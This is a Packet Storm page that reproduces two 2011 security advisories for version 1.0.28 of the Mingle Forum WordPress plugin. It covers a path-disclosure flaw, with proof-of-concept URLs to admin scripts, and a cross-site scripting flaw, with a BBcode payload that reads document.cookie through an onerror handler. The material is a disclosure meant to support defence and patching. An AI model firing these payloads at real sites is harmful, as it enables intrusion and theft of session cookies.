what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Mingle Forum WordPress Plugin 1.0.28 Cross Site Scripting / Path Disclosure

Mingle Forum WordPress Plugin 1.0.28 Cross Site Scripting / Path Disclosure
Posted Mar 1, 2011
Authored by High-Tech Bridge SA | Site htbridge.com

Mingle Forum WordPress plugin version 1.0.28 suffers from cross site scripting and path disclosure vulnerabilities.

tags | exploit, vulnerability, xss, info disclosure
SHA-256 | 77e1d1a7404be9664728b2c966c2bef18b65b04543fe9c26c9a19e9d56b6ebf8

Mingle Forum WordPress Plugin 1.0.28 Cross Site Scripting / Path Disclosure

Change Mirror Download
==================================
Vulnerability ID: HTB22849
Reference: http://www.htbridge.ch/advisory/path_disclosure_in_mingle_forum_wordpress_plugin.html
Product: Mingle Forum wordpress plugin
Vendor: Cartpauj ( http://cartpauj.com/ )
Vulnerable Version: 1.0.28
Vendor Notification: 15 February 2011
Vulnerability Type: Path disclosure
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
The vulnerability exists due to failure in the "/wp-content/plugins/mingle-forum/fs-admin/wpf-*.php" scripts, it's possible to generate an error that will reveal the full path of the script.
A remote user can determine the full path to the web root directory and other potentially sensitive information.

The following PoC is available:


http://[host]/wp-content/plugins/mingle-forum/fs-admin/wpf-usergroup-edit.php
http://[host]/wp-content/plugins/mingle-forum/fs-admin/wpf-add-group.php
http://[host]/wp-content/plugins/mingle-forum/fs-admin/wpf-add-forum.php
http://[host]/wp-content/plugins/mingle-forum/fs-admin/wpf-moderator.php


==================================
Vulnerability ID: HTB22848
Reference: http://www.htbridge.ch/advisory/xss_in_mingle_forum_wordpress_plugin.html
Product: Mingle Forum wordpress plugin
Vendor: Cartpauj ( http://cartpauj.com/ )
Vulnerable Version: 1.0.28
Vendor Notification: 15 February 2011
Vulnerability Type: XSS (Cross Site Scripting)
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

The following PoC BBcode is available:


[img][url]onerror=javascript:alert(document.cookie);"'[/url][/img]


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close